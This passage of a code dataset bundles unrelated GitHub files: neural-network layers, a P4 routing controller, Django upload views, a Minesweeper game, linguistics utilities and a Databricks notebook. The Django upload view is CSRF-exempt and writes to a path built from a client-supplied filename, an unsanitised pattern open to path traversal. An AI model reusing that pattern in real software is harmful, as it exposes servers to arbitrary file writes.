kernel_size=1, stride=stride,\n pad_mode='same', padding=0, dilation=dilation, group=1, has_bias=True,\n weight_init=TruncatedNormal(0.05))\n\n def construct(self, x):\n x = self.ds_conv(x)\n return x\n\n\nclass ScConv(nn.Cell):\n \"\"\"\n Building gate branch of single-channel LWGC.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n padding(int): the number of padding on the height and width directions of the input.\n dilation(int): dilation size of convolution kernel.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, kernel_size, stride, padding, dilation):\n super(ScConv, self).__init__()\n self.single_channel_conv = nn.Conv2d(in_channels=in_channel, out_channels=1, kernel_size=kernel_size,\n stride=stride, pad_mode='same', padding=padding, dilation=dilation,\n group=1, has_bias=True, weight_init=TruncatedNormal(0.05))\n\n def construct(self, x):\n x = self.single_channel_conv(x)\n return x\n\n\nclass GatedConv2d(nn.Cell):\n \"\"\"\n Implement complete depth-separable and single-channel LWGC operation.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n out_channel(int): spatial dimension of output tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n sc(bool): if True, the network is single-channel LWGC; otherwise, it is depth-separable LWGC operation.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, out_channel, kernel_size, stride, dilation, sc=False):\n super(GatedConv2d, self).__init__()\n self.activation = nn.ELU(alpha=1.0)\n if sc:\n self.conv2d = nn.Conv2d(in_channel, out_channel, kernel_size, stride, pad_mode='same', padding=0,\n dilation=dilation, has_bias=True, 
weight_init=TruncatedNormal(0.05))\n self.gate_factor = ScConv(in_channel, kernel_size, stride, 0, dilation)\n else:\n self.conv2d = nn.Conv2d(in_channel, out_channel, kernel_size, stride, pad_mode='same', padding=0,\n dilation=dilation, has_bias=True, weight_init=TruncatedNormal(0.05))\n self.gate_factor = DepthSeparableConv(in_channel, out_channel, stride, dilation)\n self.sigmoid = nn.Sigmoid()\n\n def construct(self, x):\n gc_f = self.conv2d(x)\n gc_g = self.gate_factor(x)\n x = self.sigmoid(gc_g) * self.activation(gc_f)\n return x\n\n\nclass TransposeGatedConv2d(nn.Cell):\n \"\"\"\n Add upsampling operation to gated convolution.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n out_channel(int): spatial dimension of output tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n sc(bool): if True, the network is single-channel LWGC; otherwise, it is depth-separable LWGC operation.\n scale_factor(int): the scale factor of new size of the tensor.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, out_channel, kernel_size, stride, dilation=1, sc=False, scale_factor=2):\n super(TransposeGatedConv2d, self).__init__()\n self.scale_factor = scale_factor\n self.gate_conv2d = GatedConv2d(in_channel, out_channel, kernel_size, stride, dilation, sc)\n\n def construct(self, x):\n x = nn.ResizeBilinear()(x, scale_factor=self.scale_factor)\n x = self.gate_conv2d(x)\n return x\n","repo_name":"mindspore-courses/applications","sub_path":"CRA/src/models/network_module.py","file_name":"network_module.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"74858684783","text":"from datetime import datetime\n\n\nRU_MONTH_VALUES = {\n 'Января': '01',\n 'Февраля': '02',\n 'Марта': '03',\n 'Апреля': '04',\n 'Мая': '05',\n 'Июня': '06',\n 'Июля': '07',\n 'Августа': '08',\n 'Сентября': '09',\n 'Октября': '10',\n 'Ноября': '11',\n 'Декабря': '12',\n}\n\n\ndef translate(date: str):\n for key in RU_MONTH_VALUES.keys():\n if key in date:\n date = date.replace(key, RU_MONTH_VALUES[key])\n return date\n\n\ndef transform(date: str):\n date = datetime.strptime(date, '%d %m %Y')\n return date\n","repo_name":"gagpa/metro_app","sub_path":"parser_news/serializers/date_translator.py","file_name":"date_translator.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"23096528145","text":"import os\nfrom p4utils.utils.helper import load_topo\nfrom p4utils.utils.sswitch_thrift_API import SimpleSwitchThriftAPI\nfrom p4utils.utils.sswitch_p4runtime_API import SimpleSwitchP4RuntimeAPI\n\nclass RoutingController(object):\n\n def __init__(self):\n\n if not os.path.exists('topology.json'):\n print('Could not find topology object!!!\\n')\n raise Exception\n\n self.topo = load_topo('topology.json')\n self.controllers = {}\n self.init()\n\n def init(self):\n self.connect_to_switches()\n self.reset_states()\n self.set_table_defaults()\n\n def reset_states(self):\n \"\"\"Resets registers, tables, etc.\n \"\"\"\n for p4rtswitch, controller in self.controllers.items():\n # Reset grpc server\n controller.reset_state()\n\n # Connect to thrift server\n thrift_port = self.topo.get_thrift_port(p4rtswitch)\n controller_thrift = SimpleSwitchThriftAPI(thrift_port)\n # Reset forwarding states\n controller_thrift.reset_state()\n\n def connect_to_switches(self):\n for p4rtswitch, data in self.topo.get_p4switches().items():\n device_id = self.topo.get_p4switch_id(p4rtswitch)\n grpc_port = self.topo.get_grpc_port(p4rtswitch)\n p4rt_path = data['p4rt_path']\n json_path = data['json_path']\n self.controllers[p4rtswitch] = SimpleSwitchP4RuntimeAPI(device_id, grpc_port,\n p4rt_path=p4rt_path,\n json_path=json_path)\n\n def set_table_defaults(self):\n for controller in self.controllers.values():\n controller.table_set_default(\"ipv4_lpm\", \"drop\", [])\n controller.table_set_default(\"ecmp_group_to_nhop\", \"drop\", [])\n\n def route(self):\n \"\"\"implement this function\"\"\"\n\n def main(self):\n self.route()\n\n\nif __name__ == \"__main__\":\n controller = RoutingController().main()\n","repo_name":"nsg-ethz/p4-learning","sub_path":"exercises/08-Simple_Routing/p4runtime/routing-controller.py","file_name":"routing-controller.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":458,"dataset":"github-code","pt":"91"}
+{"seq_id":"29544242866","text":"from threading import Event\n\nown_ip = None\n\nsession_token = None\n\nonline_users = {} \n'''list of online users on the network'''\n\nonline_contacts = {} \n'''list of trusted users on the network'''\n\ncontact_requests = {} \n'''list of contact requests received by the client'''\n\nout_contact_requests = {} \n'''list of pending contact requests sent by the client'''\n\nignore_bcast_port = [] \n'''list of ports to ignore when broadcasting'''\n\n_tcpserver = None \n'''TCP server object'''\n\nnetwork_ready = Event()\n\nstop_threads = Event()\n\n\nCERT = \"\"\nKEY = \"\"\n\nbcast_port = 1337 # temp port_manager(1377, 9900)\ntcp_listen = 9900 # temp port_manager(1377, 9900)\ntcp_port = 9900\n\n\n\n","repo_name":"DangSage/Python-Cryptography","sub_path":"src/nglobals.py","file_name":"nglobals.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28931832166","text":"# Create your views here.\nimport json\nimport os\nimport magic\n\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom django.http import HttpResponseBadRequest, Http404, HttpResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom file_sharing.models import Folders, File, UserData\n\nMEDIA_ROOT = settings.MEDIA_ROOT\n\n@login_required\ndef home(request, folder=0):\n if folder==0:\n root_folder = Folders.objects.get(user_id=request.user, level=0)\n folders = Folders.objects.filter(parent=root_folder).all()\n files = File.objects.filter(folder_id=root_folder.id).all()\n else:\n folders = Folders.objects.filter(parent_id=folder).all()\n files = File.objects.filter(folder_id=folder).all()\n \n storage, create = UserData.objects.get_or_create(user=request.user)\n ssize = storage.storage_size\n sused = storage.storage_usage\n storage = (sused*100)/ssize\n\n \n return render_to_response('file_sharing/index.html',\n {'folders':folders,\n 'folder':folder,\n 'files': files,\n 'storage': storage,\n }\n )\n\ndef save_upload( uploaded, filename, raw_data ):\n try:\n from io import FileIO, BufferedWriter\n with BufferedWriter( FileIO( filename, \"wb\" ) ) as dest:\n\n if raw_data:\n foo = uploaded.read( 1024 )\n while foo:\n dest.write( foo )\n foo = uploaded.read( 1024 ) \n # if not raw, it was a form upload so read in the normal Django chunks fashion\n else:\n for c in uploaded.chunks( ):\n dest.write( c )\n return True\n except IOError:\n # could not open the file most likely\n return False\n\n@csrf_exempt\n@login_required\ndef upload(request):\n if request.method == \"POST\":\n if request.is_ajax( ):\n upload = request\n is_raw = True\n try:\n filename = request.GET[ 'qqfile' ]\n except KeyError: \n return HttpResponseBadRequest( \"AJAX request not valid\" )\n else:\n is_raw = False\n if len( request.FILES ) == 1:\n upload = request.FILES.values( )[ 0 ]\n else:\n raise Http404( \"Bad Upload\" )\n filename = upload.name\n \n original_filename = filename\n #filename = create_filename(filename)\n #filename = \"%s/file_sharing/temp/%s\" % (MEDIA_ROOT, filename)\n base_dir = \"%s/file_sharing\" % MEDIA_ROOT\n \n folder_get = int(request.GET['folder'])\n user = request.user.username\n if folder_get != 0:\n folder = Folders.objects.get(id=folder_get)\n folder = str(folder.name).lower()\n target = \"%s/%s\" % (user, folder)\n else:\n target = \"%s\" % (user)\n \n full_target = \"%s/%s\" % (base_dir, target)\n if not os.path.exists(full_target):\n os.makedirs(full_target)\n \n filename = \"%s/%s\" % (full_target, filename)\n # save the file\n success = save_upload( upload, filename, is_raw )\n if success:\n file = File()\n file.name = original_filename\n file.target = target\n file.user = request.user\n file.size = os.path.getsize(filename)\n file.file_type = magic.from_file(filename, mime=True)\n if folder_get == 0:\n root_folder = Folders.objects.get(user=request.user, level=0)\n file.folder_id = root_folder.id\n else:\n file.folder_id = folder_get\n file.save()\n \n ret_json = {'success':success,'file':original_filename}\n return HttpResponse( json.dumps( ret_json ) )\n\n","repo_name":"afghanistanyn/django-file-sharing","sub_path":"file_sharing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"382262132","text":"import asyncio\nimport logging\nfrom asyncio import Event, Lock, Task\nfrom asyncio.exceptions import CancelledError\nfrom typing import Any, Dict, Optional\n\nimport aiohttp\n\nfrom kube.channels.objects import OEvSender\nfrom kube.client import AsyncClient\nfrom kube.config import Context\nfrom kube.model.selector import ObjectSelector\n\n\nclass AsyncClusterLoop:\n def __init__(self, *, async_loop: Any, context: Context, logger=None) -> None:\n from kube.async_loop import AsyncLoop\n\n self.async_loop: AsyncLoop = async_loop\n self.context = context\n self.logger = logger or logging.getLogger(\"cluster_loop\")\n\n self.initialized_event = Event()\n self.client: Optional[AsyncClient] = None\n\n self.watches_lock = Lock()\n self.watches: Dict[ObjectSelector, Task] = {}\n\n async def wait_until_initialized(self):\n await self.initialized_event.wait()\n\n async def get_client(self) -> AsyncClient:\n if self.client is None:\n raise RuntimeError(\"Have no client yet\")\n\n return self.client\n\n async def start_watch(\n self, selector: ObjectSelector, oev_sender: OEvSender\n ) -> None:\n assert self.client is not None # help mypy\n\n loop = self.async_loop.get_loop()\n coro = self.client.watch_objects(selector=selector, oev_sender=oev_sender)\n task = loop.create_task(coro)\n\n async with self.watches_lock:\n self.watches[selector] = task\n\n async def stop_watch(self, selector: ObjectSelector) -> None:\n async with self.watches_lock:\n task = self.watches.pop(selector, None)\n\n if task is None:\n raise RuntimeError(\"No such watch for selector %r\" % selector)\n\n try:\n task.cancel()\n except CancelledError:\n pass\n\n async def detect_stopped_watches(self):\n async with self.watches_lock:\n for selector, task in self.watches.items():\n if not task.done():\n continue\n\n exc = task.exception()\n if exc is not None:\n self.logger.error(\n \"Watch with selector %r errored out: %r\", selector, exc\n )\n return\n\n # okay, it didn't crash but... it exited for some reason?\n self.logger.warn(\n \"Watch with selector %r completed prematurely\", selector\n )\n\n async def mainloop(self):\n async with aiohttp.ClientSession() as session:\n logger = logging.getLogger(\"client\")\n logger.setLevel(logging.INFO)\n\n self.client = AsyncClient(\n session=session, context=self.context, logger=logger\n )\n\n # once we have a client we announce we are ready for use\n self.initialized_event.set()\n\n while True:\n await self.detect_stopped_watches()\n await asyncio.sleep(1)\n","repo_name":"nearmap/kubefs","sub_path":"kube/cluster_loop.py","file_name":"cluster_loop.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"10931040722","text":"from tkinter import *\nimport settings\nimport utilities\nfrom cell import Cell\n\nroot = Tk()\n# Override the settings of the window\nroot.configure(bg = \"black\")\nroot.geometry(f'{settings.WIDTH}x{settings.HEIGHT}')\nroot.title(\"Minesweeper Game\")\nroot.resizable(False, False)\n\n# Create top frame\ntop_frame = Frame(\n root,\n bg = \"black\", #change to black\n width = settings.WIDTH,\n height = utilities.height_prct(25)\n)\ntop_frame.place(x = 0, y = 0)\n\ngame_title = Label(\n top_frame,\n bg='black',\n fg='white',\n text='Minesweeper Game',\n font = ('', 48)\n)\n\ngame_title.place(\n x = utilities.width_prct(25),\n y = 0\n)\n# Create left frame\nleft_frame = Frame(\n root,\n bg = \"black\",\n width = utilities.width_prct(25),\n height = utilities.height_prct(75)\n)\nleft_frame.place(x = 0, y = utilities.height_prct(25))\n\n# Create center frame\ncenter_frame = Frame(\n root,\n bg = \"black\",\n width = utilities.width_prct(75),\n height = utilities.height_prct(75)\n)\ncenter_frame.place(x = utilities.width_prct(25), y = utilities.height_prct(25))\n\n# Create game grid\nfor x in range(settings.GRID_SIZE):\n for y in range(settings.GRID_SIZE):\n c = Cell(x, y)\n c.create_btn_object(center_frame)\n c.cell_btn_object.grid(\n column = x,\n row = y\n )\n#Call label from Cell\nCell.create_cell_count_label(left_frame)\nCell.cell_count_label_object.place(x = 0, y = 0)\nCell.randomize_mines()\n#Run the window\nroot.mainloop()","repo_name":"fueled-by-matcha/minesweeper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16198152268","text":"from uuid import uuid4\nimport collections\n\n# NOTE: what's called \"suprasegmental\" is actually meant to \"mark\" extra info around\n# a single sound that can be configured, toggled or changed independently of that\n# sound's internal value (see Phonetics for those features).\n\n# NOTE: WAIT! let's think about the construction\n# - count morae, including turning strings into morae\n# - TODO: build moraics class\n# - count syllables, including turning strings into syllables\n# - TODO: build syllabics class\n# - TODO: revamp this class\n# - store seg marker names mapped to mark symbols\n# - store mark symbols mapped to marked sounds\n# - store marked sounds mapped to marked letters\n# - alternatively map marks to marked letters\n# - store marking or contour data telling how to apply marks\n# - index to specific syllable, mora or sound\n# - handle changes given any kind of environment\n# - features list, CV abbrev, sound, mark, mora, syllable\n# - TODO: here list an example of each kind of change to work towards\n\nclass Suprasegmentals:\n # MARKS data?\n # {\n # mark: mark_id, # use to look up marked letters/symbols\n # prioritize: feature, # attempt to mark this feature first\n # mora: 0, # number of morae from fixed point\n # relative: word/feature, # from first/nearest occurrence, otherwise whole word\n # syllable: 0, # default to syll if given? \n # handedness: l/r, # count sylls/morae either left or right\n # direction: before/after # search direction if markable not in mora/syll \n # }\n def __init__(self, phonology):\n # renderable marks for sounds or whole syllables\n # NOTE: look up non-syll mark in diacritics (or separate out letters vs sounds?)\n self.marked_sounds = {} # mark: { syllable: False, before: True, mark: \"\" }\n # marks assigning diacritics to letters\n self.diacritics = {} # mark: { symbol: marked_symbol }\n\n # store phonology for checking syllable types\n self.phonology = phonology\n self.marked_words = {\n # word_id: [mark_ids]\n }\n\n # NOTE: code for allowing multiple marks per sound, multiple marks per syllable\n self.marks = {\n # mark_id: { data } # see info below\n # headword: {\n # 'syllables': [], # list of syllable-long string lists\n # 'syllable': 0, # target syllable containing marked sound\n # 'sound': 0 # target sound this mark applies to\n # 'mark': 'id', # pointer to the mark details\n # }\n }\n self.intonation = {\n # pitch_range: character pairs\n }\n self.stress = {\n # character: feature pairs\n }\n\n # associate word lookups with contours\n # then use contours when applying changes or checking environments\n # TODO: support contours with one mark per unique contour key\n # TODO: support marks with one char per marked sound\n # - when applying marks look for first syll char taking that mark\n # - also allow for syllable mark (but store whether before/after)\n self.contours = {}\n self.syllabifications = {}\n self.default_contours = {}\n\n # TODO: rethink pitch/tone/accent alongside default and custom contours below\n def shift_accent(self, sounds, syllables=0):\n return\n def raise_pitch(self, sounds, octaves=0.0):\n return\n def reshape_pitch(self, sounds, shape):\n return\n \n # TODO: work through all possibilities: features list, CV abbrev, sound, mark, mora\n def detect_environment_including_marks(self, whole, parts):\n assert isinstance(parts, list), f\"Expected detectable part in whole to be list not {parts}\"\n assert isinstance(whole, (list, str)), f\"Expected compared whole to be string or list not 
{whole}\"\n matching_parts = [] # TODO: paired info about type of match?\n for i, symbol in enumerate(whole):\n if matching_parts == len(parts):\n return True # or matching_parts list?\n did_match = True\n for j, part in enumerate(parts):\n if not did_match:\n matching_parts = []\n break\n compared_symbol = whole[i + j]\n # treat as features\n if set(compared_symbol).issubset(self.phonology.phonetics.features.keys()):\n if set(part).issubset(set(compared_symbol)):\n matching_parts.append(part)\n continue\n # treat as single feature or abbreviation\n if isinstance(symbol, str) and part == symbol:\n matching_parts.append(part)\n continue\n # treat as single sound\n if self.phonology.has_sound(symbol):\n matching_parts.append(part)\n continue\n # treat as mark\n if self.marks.get(symbol) and part == symbol:\n matching_parts.append(part)\n continue\n did_match = False\n return False # no match\n\n def get_mark(self, mark_id):\n return self.marks[mark_id]\n\n def add_syllabification(self, word_id, syllabification=None, do_syllabify=False):\n syllabification = self.syllabify(word_id[0]) if do_syllabify else syllabification\n if syllabification and word_id not in self.syllabifications:\n self.syllabifications[word_id] = syllabification\n return self.syllabifications[word_id]\n\n def update_syllabification(self, word_id, syllabification):\n if word_id not in self.syllabifications:\n return\n self.syllabifications[word_id] = syllabification\n return self.syllabifications[word_id]\n \n def remove_syllabification(self, word_id):\n return self.syllabifications.pop(word_id, None)\n\n def add_default_contour(self, name, mark=\"\", conditioning_mark=None, offset=None, chain=None, overwrite=False):\n if not overwrite and name in self.default_contours:\n return\n \n # expect offset to be [syllable_index, symbol_index] pair\n if offset and (len(offset) != 2 or False in [isinstance(n, int) for n in offset]):\n return\n\n self.default_contours[name] = {\n 'condition': conditioning_mark, # assume word start/end if None\n 'mark': mark, # mark applied to letter\n 'offset': offset, # offset from compared mark/boundary\n 'chain': chain # default contour name to apply next\n }\n return name\n \n def get_default_contour(self, name):\n return self.default_contours.get(name)\n\n def update_default_contour(self, name, mark=None, conditioning_mark=None, offset=None, chain=None):\n contour = self.remove_default_contour(name)\n if not contour:\n return\n return self.add_default_contour(\n name,\n mark = mark if mark else contour['mark'],\n conditioning_mark = conditioning_mark if conditioning_mark else contour['condition'],\n offset = offset if offset else contour['offset'],\n chain = chain if chain else contour['chain'],\n overwrite = True\n )\n\n def remove_default_contour(self, name):\n return self.default_contours.pop(name, None)\n\n def flat_count(self, nested_list, value=None, index=None, offset=1):\n \"\"\"Count offset number of values in a list of lists disregarding depth, then\n return the nested index of that offset value. 
The offset is calculated from\n either the given index tuple positioning (outer_list_index, inner_list_index)\n or instead from the first instance of a value if one is supplied.\"\"\"\n # expect a tuple with outer, inner list indexes\n if index and (len(index) != 2 or False in [isinstance(n, int) for n in index]):\n print(f\"Failed to flat count nested list - expected index (int, int) not {index}\")\n return\n # flat count up to offset\n count = 0\n identified_compared_value = False\n # build outer, inner list indexes from first occurrence of given value\n if value:\n first_list_with_value = next(l for l in nested_list if value in l)\n outer_i = nested_list.index(first_list_with_value)\n inner_i = first_list_with_value.index(value)\n index = (outer_i, inner_i)\n # if offset is negative, do reverse look\n outer_list = reversed(nested_list) if offset < 0 else nested_list\n for i, l in enumerate(outer_list, index[0]):\n inner_list = reversed(l) if offset < 0 else l\n for j, inner_value in enumerate(inner_list):\n if identified_compared_value:\n if count == offset:\n return (i, j)\n count += 1\n elif (i, j) == index:\n identified_compared_value = True\n return ()\n\n def apply_default_contour(self, syllables, name):\n contoured = [None for syllable in syllables for symbol in syllable]\n contour = self.default_contours[name]\n \n # TODO: interpet attributes and calc mark position(s)\n # - if offset is falsy and only mark is supplied, apply it everywhere\n # - mark from start or end\n # - mark from offset from conditioner\n # - if chain then apply next (or have plural apply do this)\n if not contour['offset']: # TODO: no need to check for condition or start?\n contoured = [\n contour['mark']\n for syllable in contoured\n for mark in syllable\n ]\n # mark from another symbol\n elif contour['condition']:\n # grab indexes where conditioner appears\n compared_indexes = [\n (i, j)\n for i, syllable in enumerate(contoured)\n for j, compared_mark in enumerate(syllable)\n if compared_mark == contour['condition']\n ]\n # add mark forwards/backwards from conditioners\n for compared_index in compared_indexes:\n mark_index = self.flat_count(contoured, index=compared_index, offset=contour['offset'])\n contoured[mark_index[0]][mark_index[1]] = contour['mark']\n # mark from word start or end\n else:\n # count forwards/backwards from boundary and mark\n mark_index = self.flat_count(contoured, index=(0, 0), offset=contour['offset'])\n contoured[mark_index[0]][mark_index[1]] = contour['mark']\n \n # TODO: check for circular chain (do in plural method)\n next_contour = contour['chain']\n\n return (contoured, next_contour)\n\n # TODO: complete contours and compare to current hardcoded single-syll/char values\n # - can be use to check environment marks or to apply changes\n # - if useful enough structure the whole class around contours\n # EXs: Gk clitic tonoi, J pitch accent, Zh tone interactions, movable stress, ...\n # \n # TODO: allow setting default patterns like always high-pitch final syllable \n #\n def add_contour(self, word_id, syllabified_word=None, contour=None, do_syllabify=False, default_contour=False):\n # example_contour = [[], [], [None, 'high'], []]\n if not isinstance(word_id, (list, tuple)) or len(word_id) != 2 or not isinstance(word_id[0], str) or not isinstance(word_id[1], int):\n return\n if not contour or not isinstance(contour, (list, tuple)):\n return\n if not do_syllabify and (not syllabified_word or len(syllabified_word) != syllabified_word):\n return\n #\n # TODO: create a default 
contour\n # default_contour = []\n syllabified_word = self.phonology.syllables.syllabify(word_id[0]) if do_syllabify else syllabified_word\n # check contour\n if len(contour) > len(syllabified_word):\n return\n # TODO: format contour entry\n self.contours.setdefault(word_id, (syllabified_word, contour))\n return self.contours.get(word_id)\n # TODO: mark letters in syllables\n def apply_contour(self, word_id):\n syllabification = self.syllabifications[word_id][:]\n contour = self.contours[word_id]\n for syllable, i in enumerate(syllabification):\n syllable_marks = contour[i][:]\n current_marked = 0\n for c, j in enumerate(syllable):\n if c in self.diacritics:\n syllabification[i][j] = self.diacritics[syllable_marks[current_marked]][c]\n current_marked += 1\n # TODO: instead apply syllable-wide mark to beginning/end of syll\n if not current_marked >= len(syllable_marks):\n # FAILED to apply all marks to syllable; syllable doesn't match contour?\n return\n return syllabification\n # TODO: keep track of syllable added/removed\n def track_contour_changes(self, word_id):\n syllabification = self.syllabifications[word_id]\n syllable_ids = [i for i in range(len(syllabification))]\n def update_contour():\n # add/remove/adjust syllable ids\n return syllable_ids\n return update_contour\n\n def is_syllabified(self, word):\n \"\"\"Check for a syllabified word containing a list of syllable lists each\n containing sound strings\"\"\"\n # is a list\n if not isinstance(word, (tuple, list)):\n return False\n # is a list of syllable lists\n for syllable in word:\n if not isinstance(syllable, (tuple, list)):\n return False\n # is a sound string\n for sound in syllable:\n if not isinstance(sound, str) or not self.phonology.has_sound(sound):\n return False\n return True\n\n def map_diacritic(self, diacritic, symbol, modified_symbol, is_spelling=False):\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n diacritics.setdefault(diacritic, {})\n diacritics[diacritic][symbol] = modified_symbol\n return diacritics[diacritic]\n def unmap_diacritic(self, diacritic, symbol, is_spelling=False):\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n return diacritics[diacritic].pop(symbol, None)\n def remove_diacritic(self, diacritic, is_spelling=False):\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n return diacritics.pop(diacritic, None)\n\n # TODO: sound changes, shifts?\n def apply_marks(self, word_id, as_string=False, is_spelling=False):\n \"\"\"Build a representation of a word's sounds with diacritics and syllable marks\"\"\"\n word_details = self.marked_words.get(word_id)\n if not word_details:\n return\n syllabification = word_details['syllabification'][:]\n marked_syllables = {}\n marks = word_details['marks']\n for mark_id in marks:\n mark = self.marks.get(mark_id)\n if not mark:\n continue\n symbol = mark['symbol']\n if not mark['sound']:\n marked_syllables.setdefault(3, set()).add(symbol)\n # add/alter character marks\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n modified_symbol = diacritics[symbol][syllabification[mark['syllable']][mark['sound']]]\n syllabification[mark['syllable']][mark['sound']] = modified_symbol\n # prepend syllable marks\n for syllable_n, syllable_mark in collections.OrderedDict(marked_syllables).items():\n syllabification[syllable_n] = [syllable_mark] + syllabification[syllable_n]\n # flatten into list of symbols\n resulting_symbols = [\n syllable_symbol 
for syllable_list in syllabification\n for syllable_symbol in syllable_list\n ]\n if as_string:\n return \"\".join(resulting_symbols)\n return resulting_symbols\n\n # TODO: split marking word from adding mark\n def add_mark(self, vocabulary_item, syllabified_word=None, symbol=\"\", is_diacritic=True, pitch=None, stress=None, target_syllable=0, target_sound=None, do_syllabify=False):\n \"\"\"Mark a single word on a specific syllable, optionally a specific sound\n within that syllable\"\"\"\n # expect headword structure to match vocabulary (word, index) pair\n if not len(vocabulary_item) == 2 and isinstance(vocabulary_item[0], str) and isinstance(vocabulary_item[1], int):\n print(f\"Suprasegmentals failed to add mark - invalid vocabulary item {vocabulary_item}\")\n return\n\n # allow targeted syllable without specific targeted sound\n if not isinstance(target_sound, int):\n target_sound = None\n\n # make or check useful syllabification\n if do_syllabify:\n syllabified_word = self.syllabify(vocabulary_item[0])\n if not syllabified_word or not self.is_syllabified(syllabified_word):\n print(f\"Suprasegmentals failed to add mark - unrecognized syllabified word {syllabified_word}\")\n return\n\n if is_diacritic and not self.diacritics.get(symbol):\n print(f\"Supgrasegmentals failed to mark {vocabulary_item} - unrecognized diacritic {symbol}\")\n return\n # TODO: otherwise place where with respect to each syllable - above? before?\n\n # TODO: combining symbol mapping\n # TODO: vet characteristicts (symbol, pitch, stress)\n\n mark_id = f\"mark-{uuid4()}\"\n added_mark = {\n 'symbol': symbol,\n 'diacritic': is_diacritic,\n 'pitch': pitch,\n 'stress': stress,\n 'syllable': target_syllable,\n 'sound': target_sound\n }\n self.marks[mark_id] = added_mark\n self.marked_words.setdefault(vocabulary_item, {\n 'syllabification': syllabified_word,\n 'marks': set()\n })['marks'].add(mark_id)\n self.marked_words[syllabified_word]\n return self.get_mark(mark_id)\n \n def update_mark(self, mark_id):\n return\n def remove_mark(self, mark_id):\n return\n\n def render_marks(self, marked_word):\n return\n\n def move(self, word_id, mark_id, syllable_target):\n \"\"\"Move the targeted mark to a new syllable\"\"\"\n return\n\n ","repo_name":"Botmasher/syllables-names-generator","sub_path":"languagebuilder/phonology/suprasegmentals.py","file_name":"suprasegmentals.py","file_ext":"py","file_size_in_byte":18861,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"18389270163","text":"#!/usr/bin/python3\n\"\"\"\nscript that prints the first State object from the database hbtn_0e_6_usa\n\n - script take 3 arguments: mysql username, mysql password and database name\n - uses the module SQLAlchemy\n - import State and Base from model_state\n - script connects to a MySQL server running on localhost at port 3306\n - The state you display must be the first in states.id\n - You are not allowed to fetch all states from the database\n before displaying the result\n - If the table states is empty, print 'Nothing' followed by a new line\n\"\"\"\n\nif __name__ == '__main__':\n import sys\n from sqlalchemy import create_engine\n from sqlalchemy.orm import sessionmaker\n from model_state import Base, State\n\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]))\n Session = sessionmaker(bind=engine)\n s = Session()\n\n if not s.query(State).first():\n print(\"Nothing\")\n else:\n row = (s.query(State).first())\n print('{}: {}'.format(row.id, row.name))\n","repo_name":"tcrz/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/8-model_state_fetch_first.py","file_name":"8-model_state_fetch_first.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"8090142491","text":"# Databricks notebook source\n# MAGIC %run \"lirkov/IT Job Boards/Main\"\n\n# COMMAND ----------\n\n# DBTITLE 1,Imports\nfrom pyspark.sql import Window\nfrom delta.tables import *\n\n# COMMAND ----------\n\n# DBTITLE 1,Define variables\n# Date variables \ncurrent_year = date.today().year\ncurrent_month = \"0\" + str(date.today().month) if len(str(date.today().month)) == 1 else date.today().month\ncurrent_day = \"0\" + str(date.today().day) if len(str(date.today().day)) == 1 else date.today().day\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Create DimActivities\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Read data\n\n# COMMAND ----------\n\n# Read base\ndf_activities_noblehire_base = spark.read.format(\"parquet\").load(f\"/mnt/adlslirkov/it-job-boards/Noblehire.io/base/jobActivities/{current_year}/{current_month}/{current_day}/\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Prepare data\n\n# COMMAND ----------\n\n# Select and rename columns\ndf_activities_noblehire_enriched = (\n df_activities_noblehire_base\n .select(\n col(\"id\").alias(\"ActivitiesId\"),\n col(\"Source\").alias(\"SourceSystem\"),\n col(\"activities_0_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent0\"),\n col(\"activities_0_title\").alias(\"Activities0\"),\n col(\"activities_1_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent1\"),\n col(\"activities_1_title\").alias(\"Activities1\"),\n col(\"activities_2_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent2\"),\n 